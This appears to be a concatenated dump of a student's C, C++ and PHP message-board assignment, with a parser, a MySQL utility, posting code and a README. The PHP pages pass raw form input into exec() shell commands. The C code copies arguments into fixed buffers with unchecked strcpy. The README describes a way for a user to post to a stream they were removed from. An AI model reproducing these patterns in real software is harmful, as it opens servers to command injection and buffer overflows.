*/\n\tfor(i = 0; i < numArgs; i++)\n\t{\n\t\tint charsWritten;\n\t\tchar argBuffer[1024];\n\n\t\tcharsWritten = 0;\n\n\t\t/* grab the current argument's characters */\n\t\twhile((wholeTag[j] != ',' && j < strlen(wholeTag) - 1) || inString == 1)\n\t\t{\n\t\t\targBuffer[charsWritten] = wholeTag[j];\n\t\t\tif(wholeTag[j] == '\\\"')\n\t\t\t{\n\t\t\t\tif(inString == 1)\n\t\t\t\t{\n\t\t\t\t\tinString = 0;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcharsWritten ++;\n\t\t\tj++;\n\t\t}\n\n\t\t/* upon exiting the loop, what was the last character read? a comma? */\n\t\targs[i] = malloc(sizeof(char) * (charsWritten + 1));\n\t\tif(args[i] == NULL)\n\t\t{\n\t\t\tint k;\n\n\t\t\t/* if we fail to malloc, free every previous argument */\n\t\t\tfor(k = i; k >= 0; k--)\n\t\t\t{\n\t\t\t\tfree(args[k]);\n\t\t\t}\n\t\t\tfree(args);\n\t\t}\n\n\t\targBuffer[charsWritten] = '\\0';\n\t\tstrcpy(args[i], argBuffer);\n\n\t\t/* this means we have arrived at the end of the CURRENT tag! */\n\t\tif(wholeTag[j] == ')')\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\telse if(wholeTag[j] == ',')\n\t\t{\n\t\t\t/* skips the comma/end brace */\n\t\t\tj++;\n\t\t}\n\t}\n\n\t/* like a strings, the array of strings is NULL terminated! 
*/\n\targs[numArgs] = NULL;\n\n\treturn args;\n}\n" }, { "alpha_fraction": 0.6884287595748901, "alphanum_fraction": 0.6947737336158752, "avg_line_length": 33.02840805053711, "blob_id": "5b85754d9d57da603ebe3765de64de522184cabb", "content_id": "34ce79c2c0b7b8e87ffc229502e5850b84cd5ded", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5989, "license_type": "no_license", "max_line_length": 79, "num_lines": 176, "path": "/recognize.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains functions that are used to identify special patterns\n * \tthat occur in c/cpp files, such as function calls/declarations, variables,\n * \tclass declarations, and other things.\n */\n#ifndef __GSOVERNIGO_RECOGNIZE_H__\n#define __GSOVERNIGO_RECOGNIZE_H__\n\n#include\"vector.h\"\n\n/**\n *\tnstrchr\n *\treturns the number of characters character, which are containted in string.\n *\tPlease note, the nomenclature for this function comes from string.h's family\n *\tof strchr, strstr, strnchr, and strnstr functions, used to find characters\n *\tIN:\t\t\tstring\t\t\t- the string that will be examined for character\n *\t\t\t\tcharacter\t\t- the character to be matched.\n *\tOUT:\t\tthe number of characters character that are found in string, or\n *\t\t\t\tshould an error occur, -1 shall be returned instead.\n *\tPOST:\t\tnone.\n *\tERRO:\t\tstring is null, signaled by return of -1.\n */\nint nstrchr(char* string, char charac);\n\n/**\n *\tisValidName\n *\tchecks the current name for conformity to the c standard \n *\tIN:\t\t\tname\t\t\t- the name that will be checked for conformity\n *\tOUT:\t\treturn 1 if the name is valid, 0 otherwise.\n *\tPOST:\t\tinteger returned.\n *\tERROR:\t\tname is null.\n */\nint isValidName(char* name);\n\n/**\n * \tgetTypeID\n * \tgets the character id for the variable 
that is located at position pos in\n * \ttokens.\n * \tIN:\t\t\ttokens\t\t\t- the tokens that make up the program\n * \t\t\t\tpos\t\t\t\t- the position we are starting at\n * \tOUT:\t\ta single char, representing the type of the variable\n * \tPOST:\t\ta character has been returned\n *\tERROR:\t\ttokens are null, or pos does not point to a location that does\n *\t\t\t\tnot define a variable\n */\nchar getTypeID(Vector* tokens, int pos);\n\n/**\n *\tgetType\n *\tgets the type of the variable we are located at.\n *\tIN:\t\t\ttokens\t\t\t- the tokens that we are looking through.\n *\t\t\t\tpos\t\t\t\t- the position we are located at right now.\n *\tOUT:\t\ta malloced string that represents the type of the variable at pos\n *\tPOST:\t\tthe returned string should be destroyed or used somehow.\n *\tERROR:\t\ttokens is null, pos does not point to a variable\n */\nchar* getType(Vector* tokens, int pos);\n\n/**\n *\tisValidType\n *\tchecks if the type is valid, returns true if so. Checks restricted keywords\n *\tIN:\t\t\ttype\t\t\t- the type string that is to be checked\n *\tOUT:\t\t-1 if there is an error, 1 if the type is an *atomic*, 2 if it is\n *\t\t\t\ta valid prefix, 3 if it is a class.\n *\tPOST:\t\tan integer has been returned to the calling function.\n *\tERROR:\t\ttype is null.\n */\nint isValidType(char* type);\n\n/**\n *\tisClass\n *\tchecks preceeding and following tokens to ensure the current index is a\n *\tclass declaration/definition (essentially the same thing at this point)\n *\tIN:\t\t\ttokens\t\t\t- the tokens vector that will be checked\n *\t\t\t\tpos\t\t\t\t- the position of the vector that we will check\n *\tOUT:\t\t1 if the current token is a class, o otherwise\n *\tPOST:\t\tinteger returned.\n *\tERROR\t\ttokens null, pos invalid.\n */\nint isClass(Vector* tokens, int pos);\n\n/**\n *\tisFunction\n *\tchecks if the tokens at pos represents a function\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a 
position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isFunction(Vector* tokens, int pos);\n\n/**\n * \tisFunctionCall\n * \tchecks if the tokens at pos represents a call to a function\n * \tIN:\t\t\ttokens\t\t\t- the tokens filled with the program\n * \t\t\t\tpos\t\t\t\t- the position we are checking.\n * \tOUT:\t\t1 if valid, 0 if not.\n * \tPOST:\t\tnumber returned.\n * \tERROR:\t\ttokens is null, pos is invalid\n */\nint isFunctionCall(Vector* tokens, int pos);\n\n/**\n *\tisMemberFunction\n *\tchecks if the tokens at pos represents a member function\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isMemberFunctionCall(Vector* tokens, int pos);\n\n/**\n *\tisFunctionPointer\n *\tchecks if the tokens at pos represents a function pointer\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isFunctionPointer(Vector* tokens, int pos);\n\n/**\n *\tbeginsFunction\n *\tchecks if the tokens at pos represents the beginning of a function\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint beginsFunction(Vector* tokens, int pos);\n\n/**\n *\tisVariable\n *\tchecks if the tokens at pos represents a variable\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the 
program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isVariable(Vector* tokens, int pos);\n\n/**\n *\tisVariableDeclaration\n *\tchecks if the tokens at pos represents a variable declaration\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isVariableDeclaration(Vector* tokens, int pos);\n\n/**\n *\tisClassVariable\n *\tchecks if the tokens at pos represents a class variable\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isClassVariable(Vector* tokens, int pos);\n\n#endif\n" }, { "alpha_fraction": 0.6014370322227478, "alphanum_fraction": 0.6174978613853455, "avg_line_length": 19.929203033447266, "blob_id": "a6fbaa1bc8a61f70062ca480235d630cf9139301", "content_id": "18d4c86529d57545095a9b617c8f4b25282f62ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2366, "license_type": "no_license", "max_line_length": 97, "num_lines": 113, "path": "/db.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"dbutils.h\"\n\n#include <mysql/mysql.h>\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\nint main(int argc, char** argv)\n{\n\tint result;\n\tchar command[64];\n\tchar username[64];\n\tchar stream[64];\n\tint index;\n\tchar order[64];\n\tMYSQL mysql;\n\n\n\tif(argc < 2)\n\t{\n\t\tputs(\"Incorrect usage. 
Please invoke as:\\n\\t./db [-clear][-reset][-posts][-users][-streams]\");\n\t\treturn 1;\n\t}\n\telse\n\t{\n\t\tstrcpy(command, argv[1]);\n\t\tif(argc > 5)\n\t\t{\n\t\t\tstrcpy(username, argv[2]);\n\t\t\tstrcpy(stream, argv[3]);\n\t\t\tindex = atoi(argv[4]);\t\t\n\t\t\tstrcpy(order, argv[5]);\n\t\t}\n\t}\n\n\tresult = mysql_startConnect(&mysql);\n\n\tif(result < 0)\n\t{\n\t\tputs(\"Error in initializing SQL\");\n\t}\n\n\tresult = 0;\n\n\tif(strcmp(command, \"-clear\") == 0)\n\t{\n\t\tresult = mysql_clear(&mysql);\n\t}\n\telse if(strcmp(command, \"-make\") == 0)\n\t{\n\t\tresult = mysql_make(&mysql);\n\t}\n\telse if(strcmp(command, \"-reset\") == 0)\n\t{\n\t\tresult = mysql_reset(&mysql);\n\t}\n\telse if(strcmp(command, \"-posts\") == 0)\n\t{\n\t\tresult = mysql_posts(&mysql);\n\t}\n\telse if(strcmp(command, \"-users\") == 0)\n\t{\n\t\tresult = mysql_users(&mysql);\n\t}\n\telse if(strcmp(command, \"-streams\") == 0)\n\t{\n\t\tresult = mysql_streams(&mysql);\n\t}\n\telse if(strcmp(command, \"-help\") == 0)\n\t{\n\t\tputs(\"NAME\\n\\tdb - manages an sql database to hold message posts.\\n\");\n\t\tputs(\"SYNOPSIS\\n\\tdb [command]\\n\");\n\t\tputs(\"DESCRIPTION\\n\");\n\t\tputs(\"\\t-make\\n\\t\\tcreates the databases to be used to store the messages.\\n\");\n\t\tputs(\"\\t-clear\\n\\t\\tclears the database files of all entries.\\n\");\n\t\tputs(\"\\t-reset\\n\\t\\tdrops all the tables from the database.\\n\");\n\t\tputs(\"\\t-posts\\n\\t\\tprints all the posts that are in the database.\\n\");\n\t\tputs(\"\\t-streams\\n\\t\\tprints all the streams found in the database.\\n\");\n\t\tputs(\"\\t-users\\n\\t\\tprints all the users found in the database.\\n\");\n\t\tputs(\"\\t-help\\n\\t\\t... 
really...?\\n\");\n\t\tputs(\"AUTHOR\\n\\tJulian Sovernigo\\n\\[email protected]\\n\\t0948924\");\n\t}\n\telse if(strcmp(command, \"last\") == 0)\n\t{\n\t\tint lr;\n\n\t\tlr = getLastRead(username, stream, &mysql);\n\t\tprintf(\"%d\\n\", lr);\n\t}\n\telse if(strcmp(command, \"view\") == 0)\n\t{\n\t\tgetPostN(username, stream, order, index, &mysql);\n\t}\n\telse if(strcmp(command, \"len\") == 0)\n\t{\n\t\tint nposts;\n\n\t\tnposts = numposts(stream, &mysql);\n\t\tprintf(\"%d\\n\", nposts);\n\t}\n\telse if(strcmp(command, \"streams\") == 0)\n\t{\n\t\tgetStreams(username, &mysql);\t\n\t}\n\n\tif(result != 0)\n\t{\n\t\tputs(\"Something went wrong!\");\n\t}\n\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5734870433807373, "alphanum_fraction": 0.5782901048660278, "avg_line_length": 19.019229888916016, "blob_id": "42a32bf0e594947eba924ffb008151b335eafff9", "content_id": "5f0b4bad4b4223f9e51e5a5d96da246554a79899", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 58, "num_lines": 52, "path": "/addauthor.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Add or Remove from Streams</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\n\n/* this is used to add/remove something to a stream. 
*/\nif(isset($_POST[\"action\"]))\n{\n\tif($_POST[\"action\"] == \"add\")\n\t{\n\t\t$sstring = \"\";\n\t\tforeach($_POST[\"streams\"] as $stream)\n\t\t{\n\t\t\t$sstring = $sstring.$stream.',';\n\t\t}\n\t\t$sstring = $sstring.$_POST[\"newstreams\"];\n\t\t$username = $_POST[\"username\"];\n\t\tif($sstring{strlen($sstring) - 1} === ',')\n\t\t{\n\t\t\t$sstring = substr($sstring, 0, -1);\n\t\t}\n\t\t$sstring = trim($sstring);\n\t\t$sstring = str_replace(' ', '', $sstring);\n\t\texec(\"./addauthor $username $sstring\", $aout, $ares);\n\t}\n\telseif($_POST[\"action\"] == \"remove\")\n\t{\n\t\t$sstring = \"\";\n\t\tforeach($_POST[\"streams\"] as $stream)\n\t\t{\n\t\t\t$sstring = $sstring.$stream.',';\n\t\t}\n\t\t$sstring = substr($sstring, 0, -1);\n\t\t$username = $_POST[\"username\"];\n\n\t\texec(\"./addauthor $username $sstring -r\", $aout, $ares);\n\t}\n}\n\nexec(\"./create addauthor.wpml\", $output, $result);\ninclude \"interpret.php\";\n\n?>\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.5786259770393372, "alphanum_fraction": 0.580152690410614, "avg_line_length": 19.46875, "blob_id": "37f5730a582ae01f710567cd5dcfa02c7b8fdb03", "content_id": "316ec89c45d150ab97cbbf60981e2553bfc115f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 655, "license_type": "no_license", "max_line_length": 135, "num_lines": 32, "path": "/post.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n<body>\n\n<head>\n\t<title>Post Submitted</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<?php\n\nexec(\"./create post.wpml\", $output, $result);\ninclude \"interpret.php\";\n\nif(isset($_POST[\"postpressed\"]))\n{\n\texec(\"./post \\\"\".$_POST[\"username\"].\"\\\" \\\"\".$_POST[\"stream\"].\"\\\" \\\"\".$_POST[\"post\"].\"\\n\\\"\", $pout, $pres);\n\n\techo \"<div id=\\\"card\\\">\";\n\tif($pres > 0)\n\t{\n\t\techo \"<br><br><p style=\\\"text-align: center\\\">Something 
went wrong while postng.<br>Nothing seems to have been written.</p><br><br>\";\n\t}\n\telse\n\t{\n\t\techo \"<br><br><p style=\\\"text-align: center\\\">Post Submitted!</p><br><br>\";\n\t}\n\techo \"</div>\";\n}\n\n?>\n</body>\n</html>\n" }, { "alpha_fraction": 0.6275168061256409, "alphanum_fraction": 0.6275168061256409, "avg_line_length": 15.55555534362793, "blob_id": "bbec7050965cdae79cc7433ee2b8f67b25a56a08", "content_id": "ecf29f8799018590d397b669ffc89e8b5890a2ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 298, "license_type": "no_license", "max_line_length": 78, "num_lines": 18, "path": "/index.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Message Login</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\nexec(\"./create index.wpml\", $output, $result);\ninclude \"interpret.php\";\n\necho \"<input type=\\\"hidden\\\" name=\\\"first\\\" value=\\\"yes\\\" form=\\\"gotoview\\\">\";\n?>\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.6710929274559021, "alphanum_fraction": 0.6802859902381897, "avg_line_length": 25.106666564941406, "blob_id": "86a27e64a2e87be8afb2a480f5ebcbfe7d63ef9e", "content_id": "10d3fd89bf00e97dabe86c500efdc63c15a921a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1958, "license_type": "no_license", "max_line_length": 79, "num_lines": 75, "path": "/stream.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tthis file contains the library API for the stream lib.\n *\tThese functions are used to modify stream files in messages/\n */\n#ifndef __GSOVERNIGO_STREAM_H__\n#define __GSOVERNIGO_STREAM_H__\n\n#include <mysql/mysql.h>\n\nstruct userPost\n{\n\tchar* username;\n\tchar* streamname;\n\tchar* 
date;\n\tchar* text;\n};\n\n\n/**\n *\n */\nchar* compdate();\n\n/**\n * \tupdateStream\n * \tPosts a userpost to the file identified in it.\n *\tIN:\t\t\tst\t\t\t- the userpost struct we want to post\n *\t\t\t\t\t\t\t to.\n *\tOUT:\t\treturns 0 on success.\n *\tPOST:\t\tst has been written to its appropriate stream file in messages/\n *\tERROR:\t\tst is null, or any of their fields are invalid or null\n */\nint updateStream(struct userPost* st);\n\n/**\n *\taddUser\n *\tadds a user to a stream file. files are called messages/<stname>StreamUsers\n *\tIN:\t\t\tusername\t- a username we will add\n *\t\t\t\tlist\t\t- a list of streams to be added to.\n *\tOUT:\treturns 0 on success.\n *\tPOST:\tusername has been added to all files specified by list.\n *\tERROR:\tlist contains references to files which are too privilledged.\n */\nint addUser(char* username, char* list);\n\n/**\n *\tremoveUser\n *\tremoves a user from the files specified in list.\n *\tIN:\t\t\tusername\t- the username we will be removing.\n *\t\t\t\tlist\t\t- the list of streams to remove the user from.\n *\tOUT:\t\treturns 0 on success.\n *\tPOST:\t\tusername has been removed from all files named in list.\n *\tERROR:\t\tusername does not exist in the file, or list contains references\n *\t\t\t\tto streams that we cannot access.\n */\nint removeUser(char* username, char* list);\n\n/**\n *\tcheckIfPresent\n *\tchecks if a word is present inside the file named in fname.\n *\tIN:\t\t\tfname\t\t- the file name we will be checking.\n *\t\t\t\tword\t\t- the word to search for.\n *\tOUT:\t\t1 if word is present in file, 0 if not.\n *\tPOST:\t\tinteger returned.\n *\tERROR:\t\tfname is invalid or null, word is null.\n */\nint checkIfPresent(char* fname, char* word);\n\n#endif\n" }, { "alpha_fraction": 0.6559337377548218, "alphanum_fraction": 0.6706531643867493, "avg_line_length": 35.233333587646484, "blob_id": "e04e65eebbf547cc947d1d459961c4c32047dfd4", "content_id": "62f09630929e5fb8b0f3a04e6910e3d25f7a1c8a", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2174, "license_type": "no_license", "max_line_length": 77, "num_lines": 60, "path": "/readme.txt", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "*************************************************\nJulian Sovernigo 0948924\[email protected]\nCIS2750_W17 A4: SQL and Messages\n3/31/2017\n*************************************************\n\n******************\nPledge of Honesty\n******************\n By handing in this assignment with this README file, I\nassert that I have sole access and control over my submission,\nand that this submission contains entirely my own work. I\naffirm that I have not colaborated in the creation of this code,\nnor have I taken any segment of code that I do not have express\nownership or permission to use.\n\n************\nCompilation\n************\n\n1- cd to the root folder of the program\n2- type 'make' in the root folder.\n3- to remove resources generated by compilation, please type 'make clean'\n\n********************\nRunning the program\n********************\n\n1- cd to the root folder of the program\n2- 3 programs, post, addauthor, and view.py exist, as well as db.\n\n************\nLimitations\n************\n\n\tWith the manipulation of the forward/backward arrows on a browser,\nthe passing of items between two pages can be desynchronized, and broken.\nIf you want to transition pages, change using the back button provided on\nthe page only, unless none is provided, in which case, the back arrow is \nsafe to use.\n\n\tAlso please note that he change author, and the add/remove author page\nis available through the same button in the top left hand corner. This was\ndone to preserve the propogation of values between pages.\n\n\tIt is also possible to manipulate the user into being able to post in\na stream that they do not belong to. 
This can be done by:\n\t- logging in as a user 'A'\n\t- selecting stream '1'\n\t- logging in another tab as user 'B'\n\t- selecting stream '1'\n\t- posting as 'B' to '1'\n\t- entering the post screen as user 'A' for '1'\n\t- removing user 'A' from stream '1', using 'B''s tab\n\t- posting as 'A' in the now locked stream.\n\tThis sequence can be used to break the way the post-read cycle operates,\nallowing the desynchronization and eventual damage to the database (causes\npermenant seg-faults as user 'A', since the user still has a registered last-\nread field in his info section.\n" }, { "alpha_fraction": 0.5891987681388855, "alphanum_fraction": 0.6097831130027771, "avg_line_length": 17.983192443847656, "blob_id": "5de0c9c63d3a14fd1870b4266d974d64b9f8ab2a", "content_id": "bf76c1555e13c29b1fb544e5241fc46c48f1c425", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4518, "license_type": "no_license", "max_line_length": 162, "num_lines": 238, "path": "/post.cc", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains the C++Lite code for functions designed to\n *\tcollect and post information to a message board.\n */\n \n#include \"stream.h\"\n#include <time.h>\n#include <string.h>\n#include <stdlib.h>\n#include <stdio.h>\n\nclass PostEntry\n{\n\n\tchar* readInput()\n\t{\n\t\tint currentSize;\n\t\tint currentLen;\n\n\t\tchar temp[256];\n\t\tchar* text;\n\n\t\ttext = malloc(sizeof(char) * 512);\n\t\t/* check if malloc failed */\n\t\tif(text == NULL)\n\t\t{\n\t\t\treturn NULL;\n\t\t}\n\n\t\t/* sets up the string's inital parameters. 
*/\n\t\tcurrentSize = 512;\n\t\ttext[0] = '\\0';\n\t\tcurrentLen = 0;\n\n\t\t/* puts the initial prompt on the screen */\n\t\tfputs(\"Please enter your text: \", stdout);\n\t\twhile(fgets(temp, 255, stdin) != NULL)\n\t\t{\n\t\t\tfputs(\"- \", stdout);\n\n\t\t\t/* adds the total size to the currently stored size */\n\t\t\tcurrentLen += strlen(temp);\n\t\t\tif(currentLen >= currentSize)\n\t\t\t{\n\t\t\t\t/* add extra length to the string */\n\t\t\t\ttext = doubleString(text, &currentSize);\n\t\t\t}\n\n\t\t\t/* add it to the total buffer we are using. */\n\t\t\tstrcat(text, temp);\n\t\t}\n\t\tputs(\"\\n\");\n\n\t\tif(text[strlen(text) - 1] == '\\n' && text[strlen(text) - 2] == '\\n')\n\t\t{\n\t\t\ttext[strlen(text) - 1] = '\\0';\n\t\t}\n\n\t\treturn text;\n\t}\n\n\tchar* getTimeDate()\n\t{\n\t\tchar month[4];\n\n\t\tchar* timeStamp;\n\t\ttime_t rawNow;\n\n\t\tstruct tm * now;\n\n\t\t/* gets the raw time from the clock */\n\t\trawNow = time(NULL);\n\t\tnow = localtime(&rawNow);\n\n\t\t/* mallocs the time stamp we are using for the current date. */\n\n\t\ttimeStamp = malloc(sizeof(char) * strlen(\"MON. 
DD, YYYY HH:MM PM\") + 1);\n\n\t\t/* essentially creates the month based on the local timestamp */\n\t\tswitch(now->tm_mon)\n\t\t{\n\t\t\tcase(0):\n\t\t\t\tstrcpy(month, \"Jan\");\n\t\t\t\tbreak;\n\t\t\tcase(1):\n\t\t\t\tstrcpy(month, \"Feb\");\n\t\t\t\tbreak;\n\t\t\tcase(2):\n\t\t\t\tstrcpy(month, \"Mar\");\n\t\t\t\tbreak;\n\t\t\tcase(3):\n\t\t\t\tstrcpy(month, \"Apr\");\n\t\t\t\tbreak;\n\t\t\tcase(4):\n\t\t\t\tstrcpy(month, \"May\");\n\t\t\t\tbreak;\n\t\t\tcase(5):\n\t\t\t\tstrcpy(month, \"Jun\");\n\t\t\t\tbreak;\n\t\t\tcase(6):\n\t\t\t\tstrcpy(month, \"Jul\");\n\t\t\t\tbreak;\n\t\t\tcase(7):\n\t\t\t\tstrcpy(month, \"Aug\");\n\t\t\t\tbreak;\n\t\t\tcase(8):\n\t\t\t\tstrcpy(month, \"Sep\");\n\t\t\t\tbreak;\n\t\t\tcase(9):\n\t\t\t\tstrcpy(month, \"Oct\");\n\t\t\t\tbreak;\n\t\t\tcase(10):\n\t\t\t\tstrcpy(month, \"Nov\");\n\t\t\t\tbreak;\n\t\t\tcase(11):\n\t\t\t\tstrcpy(month, \"Dec\");\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t/* error case, this will be because localtime() has failed for some reason. */\n\t\t\t\tbreak;\n\t\t}\n\t\t/* prints the final format to the string to be returned. */\n\t\tsprintf(timeStamp, \"%3s. 
%2d, %4d %02d:%02d %2s\", month, now->tm_mday, now->tm_year + 1900, now->tm_hour % 12, now->tm_min, (now->tm_hour / 12 > 0 )?\"PM\":\"AM\");\n\t\ttimeStamp[22] = '\\0';\n\n\n\t\treturn timeStamp;\n\t}\n\n\tstruct userPost* formatEntry(char* username, char* streamname, char* text)\n\t{\n\t\tchar* timeStamp;\n\t\t\n\t\tstruct userPost* newPost;\n\n\t\tnewPost = malloc(sizeof(struct userPost));\n\t\t/* if malloc has for some reason failed */\n\t\tif(newPost == NULL)\n\t\t{\n\t\t\treturn NULL;\n\t\t}\n\n\t\ttimeStamp = getTimeDate();\n\n\t\t/* mallocs the items in the struct */\n\t\tnewPost->username = malloc(sizeof(char) * strlen(username) + 1);\n\t\tnewPost->streamname = malloc(sizeof(char) * strlen(streamname) + 1);\n\t\tnewPost->date = malloc(sizeof(char) * strlen(timeStamp) + 1);\n\t\tnewPost->text = malloc(sizeof(char) * strlen(text) + 1);\n\t\t\n\t\t/* copies the info into the struct. */\n\t\tstrcpy(newPost->username, username);\n\t\tstrcpy(newPost->streamname, streamname);\n\t\tstrcpy(newPost->date, timeStamp);\n\t\tstrcpy(newPost->text, text);\n\t\t\n\t\tfree(timeStamp);\n\n\t\treturn newPost;\n\t}\n\n\tint submitPost(struct userPost* post)\n\t{\n\t\tif(post == NULL)\n\t\t{\n\t\t\treturn -1;\n\t\t}\n\n\t\treturn updateStream(post);\n\t}\n};\n\nchar* doubleString(char* currentString, int * currentLen)\n{\n\tint i;\n\tchar* newString;\n\n\t/* creates a new string, twice as long */\n\tnewString = malloc(sizeof(char) * (*currentLen) * 2 + 1);\n\t*currentLen *= 2;\n\n\t/* copy the old string */\n\tfor(i = 0; i < strlen(currentString); i++)\n\t{\n\t\tnewString[i] = currentString[i];\n\t}\n\n\t/* frees the old string */\n\tfree(currentString);\n\n\treturn newString;\n}\n\nint main(int argc, char** argv)\n{\n\tint result;\n\tchar userName[512];\n\tchar* post;\n\tchar stream[512];\n\n\tstruct userPost* pt;\n\n\tclass PostEntry pe;\n\n\tif(argc < 4)\n\t{\n\t\treturn 1;\n\t}\n\n\tstrcpy(userName, argv[1]);\n\tstrcpy(stream, argv[2]);\n\tpost = malloc(sizeof(char) * 
(strlen(argv[3]) + 1));\n\tstrcpy(post, argv[3]);\n\n\tpt = pe.formatEntry(userName, stream, post);\n\tresult = pe.submitPost(pt);\n\n\tfree(pt->username);\n\tfree(pt->streamname);\n\tfree(pt->date);\n\tfree(pt->text);\n\tfree(pt);\n\n\tfree(post);\n\n\tif(result != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.4698244631290436, "alphanum_fraction": 0.49230584502220154, "avg_line_length": 17.81900405883789, "blob_id": "f850d95e7d7c2c6dafbbd27d3bbe90c387833467", "content_id": "876bac2249d539235d628fe7f5231d3910f6e7a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 8318, "license_type": "no_license", "max_line_length": 97, "num_lines": 442, "path": "/parseFile.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tThis file contains several methods for parsing a file into tokens\n * \tthat, if printed again in that order, will constitute a working cpp\n * \tprogram.\n */\n#include\"parseFile.h\"\n#include<stdio.h>\n#include<string.h>\n#include<stdlib.h>\n\n#include<assert.h>\n\nVector* getTokens(char* fname)\n{\n\tchar c;\n\tchar lastPrint;\n\tint i;\n\n\tint inString;\n\tint in89Comment;\n\tint in99Comment;\n\t/*\n\tint inInclude;\n\t*/\n\tchar* buffer;\n\n\tFILE* fin;\n\tVector* tokens;\n\n\tfin = fopen(fname, \"r\");\n\tif(fin == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tbuffer = malloc(sizeof(char)*512);\n\n\tlastPrint = '\\0';\n\n\tinString = 0;\n\tin89Comment = 0;\n\tin99Comment = 0;\n\t/*inInclude = 0;*/\n\ti = 0;\n\n\t/* sets up the vector to be filled */\n\ttokens = makeVector(100);\n\n\t/* collects the characters into tokens one char at a time */\n\tdo\n\t{\n\t\tc = fgetc(fin);\n\n\t\tif(strchr(\"\\n\\t\\r \", c) != NULL)\n\t\t{\n\t\t\t/* if we need to preserve whitespace right now. 
